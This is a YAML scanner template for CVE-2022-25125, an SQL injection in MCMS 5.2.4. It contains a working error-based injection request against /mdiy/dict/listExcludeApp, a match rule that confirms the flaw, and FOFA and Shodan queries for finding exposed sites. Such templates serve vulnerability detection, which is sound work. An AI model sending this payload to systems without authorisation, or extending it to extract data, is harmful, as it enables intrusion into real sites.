id: CVE-2022-25125

info:
  name: MCMS 5.2.4  - SQL Injection
  author: Co5mos
  severity: critical
  verified: true
  description: |
    MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
    FOFA: icon_hash="1464851260"
    SHODAN: http.favicon.hash:1464851260
  reference:
    - https://github.com/ming-soft/MCMS/issues/90
    - https://gitee.com/mingSoft/MCMS/issues/I4TGYI
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25125
  tags: cve,cve2022,sqli,mcms
  created: 2023/06/16

set:
  num: "999999999"
rules:
  r0:
    request:
      method: GET
      path: "/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"
    expression: response.body.bcontains(b'c8c605999f3d8352d7bb792cf3fdb25')
expression: r0()